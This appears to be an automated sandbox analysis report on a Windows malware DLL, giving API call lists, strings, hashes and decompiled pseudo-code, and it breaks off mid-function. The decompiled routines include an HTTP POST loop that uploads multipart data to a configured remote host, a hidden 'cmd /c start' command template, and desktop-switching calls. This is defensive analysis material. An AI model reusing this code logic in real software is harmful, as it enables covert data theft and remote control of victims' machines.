    • GetProcessHeap.KERNEL32(00000008,00001770,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9DFF
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9E06
    • RtlZeroMemory.NTDLL(?,00000060), ref: 6ECA9E1D
    • LoadStringW.USER32 ref: 6ECA9E67
    • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 6ECA9E80
    • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 6ECA9E99
    • StrChrW.SHLWAPI(00000320,0000000A), ref: 6ECA9EA2
    • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 6ECA9ECB
    • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 6ECA9EEB
    • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 6ECA9F00
    • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 6ECA9F45
    • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 6ECA9F5E
    • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 6ECA9F7D
    • PathGetDriveNumberA.SHLWAPI(?), ref: 6ECA9F8B
    • PathBuildRootW.SHLWAPI(?,00000000), ref: 6ECA9F97
    • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 6ECA9FB5
    • wsprintfW.USER32 ref: 6ECA9FE0
    • GetProcessHeap.KERNEL32(00000000,00000105), ref: 6ECA9FFD
    • HeapAlloc.KERNEL32(00000000), ref: 6ECAA000
    • wsprintfA.USER32 ref: 6ECAA01C
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECAA048
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECAA04B
    • Sleep.KERNEL32(000001F4), ref: 6ECAA060
    • Sleep.KERNEL32(000001F4), ref: 6ECAA072
    • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 6ECAA093
    • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 6ECAA0B1
    • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 6ECAA0BD
    • Sleep.KERNEL32(000001F4), ref: 6ECAA0C8
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECAA0D1
    • HeapFree.KERNEL32(00000000), ref: 6ECAA0D8
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6ECAA0E3
    • LocalFree.KERNEL32(00000000), ref: 6ECAA0EF
    • FreeLibrary.KERNEL32(00000000,00000001,FF000000), ref: 6ECAA0F7
    • CoUninitialize.OLE32 ref: 6ECAA0FD
    • SwitchDesktop.USER32(00000000), ref: 6ECAA109
    • SetThreadDesktop.USER32(00000000), ref: 6ECAA116
      • Part of subcall function 6ECA1DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1E3E
      • Part of subcall function 6ECA1DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6ECA1E48
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$AllocFormatSleepwsprintf$LocalPathSwitchThreadlstrlen$BuildCommandComputeCrc32DriveInformationInitializeLineMemoryNumberRootUninitializeVolumeZero
    • String ID: %s%s$/c start /b "" "%s" f w %d$<n/a>$DFDWiz.exe$`$comctl32.dll
    • API String ID: 3108343870-2776518243
    • Opcode ID: 1ee8778ffb216fb0951f3ae4327e4fbe517fb911186fe5be5bc534c94cf54683
    • Instruction ID: efb8bf53c2856de7698b6a0a3be2ab4ef9ada066161a8b90c3864d58a2ede00c
    • Opcode Fuzzy Hash: 1ee8778ffb216fb0951f3ae4327e4fbe517fb911186fe5be5bc534c94cf54683
    • Instruction Fuzzy Hash: 1AB15071144746ABE7609FA8CD89F9F7BB8EB89B44F00481CFB5697180EBB19444CF26
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E6ECA5690() {
    				char* _t71;
    				long _t87;
    				void* _t100;
    				intOrPtr _t102;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    				void* _t107;
    				void* _t108;
    				void* _t109;
    				void* _t111;
    				CHAR* _t114;
    				int _t115;
    				long _t116;
    				long _t119;
    				void* _t122;
    				intOrPtr _t146;
    				void* _t147;
    				void* _t149;
    				intOrPtr _t150;
    				void* _t151;
    				void* _t152;
    				int _t153;
    				intOrPtr _t154;
    				void* _t156;
    				void* _t157;
    
    				 *((intOrPtr*)(_t156 + 0x20)) = 0;
    				 *(_t156 + 0x1c) = 0;
    				_t3 = GetTickCount() + 0x493e0; // 0x493e0
    				_t146 = _t3;
    				 *((intOrPtr*)(_t156 + 0x38)) = _t146;
    				while(1) {
    					_t150 =  *((intOrPtr*)(_t156 + 0x40));
    					 *(_t156 + 0x18) = 0x842a0000;
    					if( *(_t150 + 0xc) != 0) {
    						 *(_t156 + 0x18) = 0x84aa3300;
    					}
    					_t71 = M6ECB0518; // 0x0
    					_t152 = InternetOpenA(_t71, 1, 0, 0, 0);
    					 *(_t156 + 0x30) = _t152;
    					if(_t152 == 0) {
    						L28:
    						if(GetTickCount() >= _t146) {
    							L32:
    							return  *((intOrPtr*)(_t156 + 0x20));
    						}
    						Sleep(0x1388);
    						continue;
    					}
    					 *((intOrPtr*)(_t156 + 0x20)) = 0x4e20;
    					InternetSetOptionA(_t152, 2, _t156 + 0x14, 4);
    					InternetSetOptionA(_t152, 5, _t156 + 0x14, 4);
    					InternetSetOptionA(_t152, 6, _t156 + 0x14, 4);
    					asm("sbb ecx, ecx");
    					_t147 = InternetConnectA(_t152,  *(_t150 + 4), ( ~( *(_t150 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
    					 *(_t156 + 0x34) = _t147;
    					if(_t147 == 0) {
    						L26:
    						InternetCloseHandle(_t152);
    						if( *(_t156 + 0x1c) != 0) {
    							goto L32;
    						}
    						_t146 =  *((intOrPtr*)(_t156 + 0x38));
    						goto L28;
    					}
    					_t122 = HttpOpenRequestA(_t147, "POST",  *(_t150 + 8), "HTTP/1.1", 0, 0,  *(_t156 + 0x18), 0);
    					if(_t122 == 0) {
    						L25:
    						InternetCloseHandle(_t147);
    						goto L26;
    					}
    					_t151 = HeapAlloc(GetProcessHeap(), 8, 0x800);
    					if(_t151 == 0) {
    						L24:
    						InternetCloseHandle(_t122);
    						_t147 =  *(_t156 + 0x34);
    						goto L25;
    					}
    					_t87 = wsprintfA(_t151, "%s", "Connection: close\r\n");
    					_t156 = _t156 + 0xc;
    					HttpAddRequestHeadersA(_t122, _t151, _t87, 0xa0000000);
    					_t153 = 0;
    					 *((intOrPtr*)(_t156 + 0x24)) = 0;
    					 *((intOrPtr*)(_t156 + 0x28)) = 0;
    					 *(_t156 + 0x18) = 0;
    					 *(_t156 + 0x30) = GetTickCount();
    					 *(_t156 + 0x1c) = RtlRandom(_t156 + 0x2c);
    					_t149 = HeapAlloc(GetProcessHeap(), 8, 0x800);
    					if(_t149 != 0) {
    						 *(_t156 + 0x34) = _t149;
    						_t153 = wsprintfA(_t149, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t156 + 0x14),  *(_t156 + 0x44));
    						_t30 = _t153 + 1; // 0x1
    						_t114 = _t149 + _t30;
    						 *(_t156 + 0x44) = _t114;
    						_t115 = wsprintfA(_t114, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t156 + 0x24)));
    						_t133 =  *((intOrPtr*)(_t156 + 0x5c));
    						 *(_t156 + 0x34) = _t115;
    						_t116 = wsprintfA(_t151, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t133 + 0x18)) + _t115 + _t153);
    						_t157 = _t156 + 0x28;
    						HttpAddRequestHeadersA(_t122, _t151, _t116, 0xa0000000);
    						_t119 = wsprintfA(_t151, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t157 + 0x14)));
    						_t156 = _t157 + 0xc;
    						HttpAddRequestHeadersA(_t122, _t151, _t119, 0xa0000000);
    					}
    					if(HttpSendRequestExA(_t122, 0, 0, 0, 0) == 0) {
    						if(GetLastError() == 0x2f7d) {
    							 *( *((intOrPtr*)(_t156 + 0x40)) + 0xc) = 0;
    						}
    						L21:
    						if(_t149 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t149);
    						}
    						HeapFree(GetProcessHeap(), 0, _t151);
    						_t152 =  *(_t156 + 0x30);
    						goto L24;
    					}
    					 *((intOrPtr*)(_t156 + 0x20)) = _t153;
    					_t100 = E6ECA54E0(_t122,  *((intOrPtr*)(_t156 + 0x24)), _t156 + 0x14);
    					_t156 = _t156 + 0xc;
    					_t154 =  *((intOrPtr*)(_t156 + 0x40));
    					if(_t100 != _t153) {
    						L19:
    						HttpEndRequestA(_t122, 0, 0, 0);
    						if( *(_t156 + 0x1c) != 0) {
    							_t102 = E6ECA5540(_t122, _t154 + 0x2c);
    							_t156 = _t156 + 8;
    							 *((intOrPtr*)(_t156 + 0x20)) = _t102;
    						}
    						goto L21;
    					}
    					_t103 = _t154 + 0x18;
    					if( *((intOrPtr*)(_t154 + 0x18)) == 0) {
    						L13:
    						_t104 = _t154 + 0x20;
    						if( *((intOrPtr*)(_t154 + 0x20)) == 0) {
    							L15:
    							_t105 = _t154 + 0x28;
    							if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
    								L17:
    								 *(_t156 + 0x30) =  *(_t156 + 0x18);
    								_t107 = E6ECA54E0(_t122,  *((intOrPtr*)(_t156 + 0x28)), _t156 + 0x24);
    								_t156 = _t156 + 0xc;
    								if(_t107 ==  *(_t156 + 0x18)) {
    									 *(_t156 + 0x1c) = 1;
    								}
    								goto L19;
    							}
    							_t108 = E6ECA54E0(_t122,  *((intOrPtr*)(_t154 + 0x24)), _t105);
    							_t156 = _t156 + 0xc;
    							if(_t108 !=  *((intOrPtr*)(_t154 + 0x28))) {
    								goto L19;
    							}
    							goto L17;
    						}
    						_t109 = E6ECA54E0(_t122,  *((intOrPtr*)(_t154 + 0x1c)), _t104);
    						_t156 = _t156 + 0xc;
    						if(_t109 !=  *((intOrPtr*)(_t154 + 0x20))) {
    							goto L19;
    						}
    						goto L15;
    					}
    					_t111 = E6ECA54E0(_t122,  *((intOrPtr*)(_t154 + 0x14)), _t103);
    					_t156 = _t156 + 0xc;
    					if(_t111 !=  *((intOrPtr*)(_t154 + 0x18))) {
    						goto L19;
    					}
    					goto L13;
    				}
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 6ECA56A1
    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6ECA56E8
    • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6ECA5714
    • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6ECA5720
    • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6ECA572C
    • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6ECA574E
    • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6ECA577C
    • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA5793
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA57A0
    • wsprintfA.USER32 ref: 6ECA57B7
    • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA57C8
    • GetTickCount.KERNEL32 ref: 6ECA57DC
    • RtlRandom.NTDLL(?), ref: 6ECA57EB
    • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA57FC
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5803
    • wsprintfA.USER32 ref: 6ECA5823
    • wsprintfA.USER32 ref: 6ECA583E
    • wsprintfA.USER32 ref: 6ECA5860
    • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5871
    • wsprintfA.USER32 ref: 6ECA5882
    • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5893
    • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6ECA58A2
    • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6ECA5953
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5978
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA597F
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5988
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA598F
    • InternetCloseHandle.WININET(00000000), ref: 6ECA599A
    • InternetCloseHandle.WININET(00000000), ref: 6ECA59A5
    • InternetCloseHandle.WININET(00000000), ref: 6ECA59AC
    • GetTickCount.KERNEL32 ref: 6ECA59BD
    • Sleep.KERNEL32(00001388), ref: 6ECA59CC
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA59D7
    Strings
    • Connection: close, xrefs: 6ECA57AC
    • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6ECA5819
    • ----------%lu--, xrefs: 6ECA5834
    • POST, xrefs: 6ECA5776
    • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6ECA587C
    • N, xrefs: 6ECA570C
    • Content-Length: %lu, xrefs: 6ECA585A
    • HTTP/1.1, xrefs: 6ECA5770
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
    • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
    • API String ID: 2546452625-2948876467
    • Opcode ID: 0f573105c592335c160c19649314f1601e207af58b87674b7cdcc6bb6326b625
    • Instruction ID: eca5b12124775ebb91bfd1d7e7ffc35456f1486dc8e17703585bd1463b9cead2
    • Opcode Fuzzy Hash: 0f573105c592335c160c19649314f1601e207af58b87674b7cdcc6bb6326b625
    • Instruction Fuzzy Hash: 3DA19EB0104306AFD7109FA8CC48F6F7BB8EB89719F004518FE469B241E774E8458F62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E6ECA56B3() {
    				char* _t65;
    				long _t81;
    				void* _t94;
    				intOrPtr _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t105;
    				CHAR* _t108;
    				int _t109;
    				long _t110;
    				long _t113;
    				void* _t117;
    				intOrPtr _t141;
    				void* _t143;
    				void* _t145;
    				intOrPtr _t146;
    				void* _t148;
    				void* _t149;
    				int _t151;
    				intOrPtr _t152;
    				void* _t154;
    				void* _t156;
    
    				while(1) {
    					_t146 =  *((intOrPtr*)(_t154 + 0x40));
    					 *(_t154 + 0x18) = 0x842a0000;
    					if( *(_t146 + 0xc) != 0) {
    						 *(_t154 + 0x18) = 0x84aa3300;
    					}
    					_t65 = M6ECB0518; // 0x0
    					_t149 = InternetOpenA(_t65, 1, 0, 0, 0);
    					 *(_t154 + 0x30) = _t149;
    					if(_t149 == 0) {
    						L28:
    						if(GetTickCount() >= _t141) {
    							L32:
    							return  *((intOrPtr*)(_t154 + 0x20));
    						}
    						Sleep(0x1388);
    						continue;
    					}
    					 *((intOrPtr*)(_t154 + 0x20)) = 0x4e20;
    					InternetSetOptionA(_t149, 2, _t154 + 0x14, 4);
    					InternetSetOptionA(_t149, 5, _t154 + 0x14, 4);
    					InternetSetOptionA(_t149, 6, _t154 + 0x14, 4);
    					asm("sbb ecx, ecx");
    					_t143 = InternetConnectA(_t149,  *(_t146 + 4), ( ~( *(_t146 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
    					 *(_t154 + 0x34) = _t143;
    					if(_t143 == 0) {
    						L26:
    						InternetCloseHandle(_t149);
    						if( *(_t154 + 0x1c) != 0) {
    							goto L32;
    						}
    						_t141 =  *((intOrPtr*)(_t154 + 0x38));
    						goto L28;
    					}
    					_t117 = HttpOpenRequestA(_t143, "POST",  *(_t146 + 8), "HTTP/1.1", 0, 0,  *(_t154 + 0x18), 0);
    					if(_t117 == 0) {
    						L25:
    						InternetCloseHandle(_t143);
    						goto L26;
    					}
    					_t148 = HeapAlloc(GetProcessHeap(), 8, 0x800);
    					if(_t148 == 0) {
    						L24:
    						InternetCloseHandle(_t117);
    						_t143 =  *(_t154 + 0x34);
    						goto L25;
    					}
    					_t81 = wsprintfA(_t148, "%s", "Connection: close\r\n");
    					_t154 = _t154 + 0xc;
    					HttpAddRequestHeadersA(_t117, _t148, _t81, 0xa0000000);
    					_t151 = 0;
    					 *((intOrPtr*)(_t154 + 0x24)) = 0;
    					 *((intOrPtr*)(_t154 + 0x28)) = 0;
    					 *(_t154 + 0x18) = 0;
    					 *(_t154 + 0x30) = GetTickCount();
    					 *(_t154 + 0x1c) = RtlRandom(_t154 + 0x2c);
    					_t145 = HeapAlloc(GetProcessHeap(), 8, 0x800);
    					if(_t145 != 0) {
    						 *(_t154 + 0x34) = _t145;
    						_t151 = wsprintfA(_t145, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t154 + 0x14),  *(_t154 + 0x44));
    						_t26 = _t151 + 1; // 0x1
    						_t108 = _t145 + _t26;
    						 *(_t154 + 0x44) = _t108;
    						_t109 = wsprintfA(_t108, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t154 + 0x24)));
    						_t128 =  *((intOrPtr*)(_t154 + 0x5c));
    						 *(_t154 + 0x34) = _t109;
    						_t110 = wsprintfA(_t148, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t128 + 0x18)) + _t109 + _t151);
    						_t156 = _t154 + 0x28;
    						HttpAddRequestHeadersA(_t117, _t148, _t110, 0xa0000000);
    						_t113 = wsprintfA(_t148, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t156 + 0x14)));
    						_t154 = _t156 + 0xc;
    						HttpAddRequestHeadersA(_t117, _t148, _t113, 0xa0000000);
    					}
    					if(HttpSendRequestExA(_t117, 0, 0, 0, 0) == 0) {
    						if(GetLastError() == 0x2f7d) {
    							 *( *((intOrPtr*)(_t154 + 0x40)) + 0xc) = 0;
    						}
    						L21:
    						if(_t145 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t145);
    						}
    						HeapFree(GetProcessHeap(), 0, _t148);
    						_t149 =  *(_t154 + 0x30);
    						goto L24;
    					}
    					 *((intOrPtr*)(_t154 + 0x20)) = _t151;
    					_t94 = E6ECA54E0(_t117,  *((intOrPtr*)(_t154 + 0x24)), _t154 + 0x14);
    					_t154 = _t154 + 0xc;
    					_t152 =  *((intOrPtr*)(_t154 + 0x40));
    					if(_t94 != _t151) {
    						L19:
    						HttpEndRequestA(_t117, 0, 0, 0);
    						if( *(_t154 + 0x1c) != 0) {
    							_t96 = E6ECA5540(_t117, _t152 + 0x2c);
    							_t154 = _t154 + 8;
    							 *((intOrPtr*)(_t154 + 0x20)) = _t96;
    						}
    						goto L21;
    					}
    					_t97 = _t152 + 0x18;
    					if( *((intOrPtr*)(_t152 + 0x18)) == 0) {
    						L13:
    						_t98 = _t152 + 0x20;
    						if( *((intOrPtr*)(_t152 + 0x20)) == 0) {
    							L15:
    							_t99 = _t152 + 0x28;
    							if( *((intOrPtr*)(_t152 + 0x28)) == 0) {
    								L17:
    								 *(_t154 + 0x30) =  *(_t154 + 0x18);
    								_t101 = E6ECA54E0(_t117,  *((intOrPtr*)(_t154 + 0x28)), _t154 + 0x24);
    								_t154 = _t154 + 0xc;
    								if(_t101 ==  *(_t154 + 0x18)) {
    									 *(_t154 + 0x1c) = 1;
    								}
    								goto L19;
    							}
    							_t102 = E6ECA54E0(_t117,  *((intOrPtr*)(_t152 + 0x24)), _t99);
    							_t154 = _t154 + 0xc;
    							if(_t102 !=  *((intOrPtr*)(_t152 + 0x28))) {
    								goto L19;
    							}
    							goto L17;
    						}
    						_t103 = E6ECA54E0(_t117,  *((intOrPtr*)(_t152 + 0x1c)), _t98);
    						_t154 = _t154 + 0xc;
    						if(_t103 !=  *((intOrPtr*)(_t152 + 0x20))) {
    							goto L19;
    						}
    						goto L15;
    					}
    					_t105 = E6ECA54E0(_t117,  *((intOrPtr*)(_t152 + 0x14)), _t97);
    					_t154 = _t154 + 0xc;
    					if(_t105 !=  *((intOrPtr*)(_t152 + 0x18))) {
    						goto L19;
    					}
    					goto L13;
    				}
    			}

    APIs
    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6ECA56E8
    • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6ECA5714
    • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6ECA5720
    • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6ECA572C
    • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6ECA574E
    • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6ECA577C
    • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA5793
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA57A0
    • wsprintfA.USER32 ref: 6ECA57B7
    • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA57C8
    • GetTickCount.KERNEL32 ref: 6ECA57DC
    • RtlRandom.NTDLL(?), ref: 6ECA57EB
    • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA57FC
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5803
    • wsprintfA.USER32 ref: 6ECA5823
    • wsprintfA.USER32 ref: 6ECA583E
    • wsprintfA.USER32 ref: 6ECA5860
    • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5871
    • wsprintfA.USER32 ref: 6ECA5882
    • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6ECA5893
    • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6ECA58A2
    • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6ECA5953
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5978
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA597F
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA5988
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6ECA74A8,?,6ECADA78), ref: 6ECA598F
    • InternetCloseHandle.WININET(00000000), ref: 6ECA599A
    • InternetCloseHandle.WININET(00000000), ref: 6ECA59A5
    • InternetCloseHandle.WININET(00000000), ref: 6ECA59AC
    • GetTickCount.KERNEL32 ref: 6ECA59BD
    • Sleep.KERNEL32(00001388), ref: 6ECA59CC
    Strings
    • Connection: close, xrefs: 6ECA57AC
    • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6ECA5819
    • ----------%lu--, xrefs: 6ECA5834
    • POST, xrefs: 6ECA5776
    • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6ECA587C
    • N, xrefs: 6ECA570C
    • Content-Length: %lu, xrefs: 6ECA585A
    • HTTP/1.1, xrefs: 6ECA5770
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseHandleHeadersOption$AllocCountFreeOpenTick$ConnectRandomSendSleep
    • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
    • API String ID: 1438124730-2948876467
    • Opcode ID: 4b2f91dab76e42ee9f3d78b147a56072f3cddfe2d16a6c5aee3a2cb0712d2c9a
    • Instruction ID: 6fb0b8c3c15e842635d9a096d63f7f9a1fe857e1847e495107e00b8289ed246c
    • Opcode Fuzzy Hash: 4b2f91dab76e42ee9f3d78b147a56072f3cddfe2d16a6c5aee3a2cb0712d2c9a
    • Instruction Fuzzy Hash: DB917EB1504706AFD7109FA8CD49FAF7BB8EB88719F104508FE469B281E770E8458F66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 32%
    			E6ECA29D0() {
    				intOrPtr _v56;
    				void* _v76;
    				intOrPtr* _v100;
    				long _v116;
    				char _v120;
    				intOrPtr _v132;
    				intOrPtr* _v140;
    				intOrPtr _v160;
    				intOrPtr _v168;
    				long _v176;
    				char _v180;
    				intOrPtr* _v192;
    				intOrPtr* _v196;
    				intOrPtr _v204;
    				char _v208;
    				char _v212;
    				intOrPtr* _v224;
    				intOrPtr _v228;
    				intOrPtr* _v236;
    				intOrPtr* _v240;
    				void* _v248;
    				intOrPtr* _v252;
    				intOrPtr _v256;
    				intOrPtr* _v264;
    				intOrPtr* _v272;
    				long _v276;
    				char _v280;
    				short _v284;
    				char _v288;
    				short _v292;
    				intOrPtr* _v300;
    				intOrPtr* _v304;
    				void* _v308;
    				void* _v312;
    				char _v316;
    				intOrPtr* _v324;
    				intOrPtr* _v336;
    				long _v352;
    				char _v356;
    				intOrPtr* _v360;
    				intOrPtr _v376;
    				intOrPtr* _v380;
    				intOrPtr _v384;
    				intOrPtr _v392;
    				intOrPtr* _v396;
    				char* _t83;
    				void* _t85;
    				intOrPtr* _t86;
    				void* _t87;
    				intOrPtr* _t88;
    				intOrPtr _t91;
    				intOrPtr* _t92;
    				intOrPtr _t94;
    				intOrPtr* _t95;
    				void* _t98;
    				intOrPtr* _t99;
    				void* _t101;
    				intOrPtr* _t102;
    				intOrPtr* _t104;
    				intOrPtr* _t107;
    				intOrPtr* _t110;
    				intOrPtr* _t113;
    				intOrPtr* _t116;
    				intOrPtr* _t118;
    				intOrPtr* _t121;
    				intOrPtr* _t124;
    				short _t127;
    				intOrPtr* _t132;
    				intOrPtr* _t137;
    				void* _t139;
    				intOrPtr* _t140;
    				intOrPtr _t142;
    				intOrPtr* _t145;
    				void* _t148;
    				intOrPtr* _t151;
    				void* _t153;
    				intOrPtr* _t154;
    				short _t157;
    				char _t158;
    				void* _t208;
    				intOrPtr _t211;
    				intOrPtr* _t212;
    				void* _t213;
    				void* _t215;
    				void* _t216;
    				void* _t217;
    				void* _t218;
    				intOrPtr* _t219;
    				void* _t220;
    
    				_v56 = 0;
    				__imp__CoInitializeEx(0, 6);
    				_t83 =  &_v76;
    				_v76 = 0;
    				__imp__CoCreateInstance(0x6ecadf9c, 0, 1, 0x6ecadecc, _t83);
    				if(_t83 < 0) {
    					return 0;
    				} else {
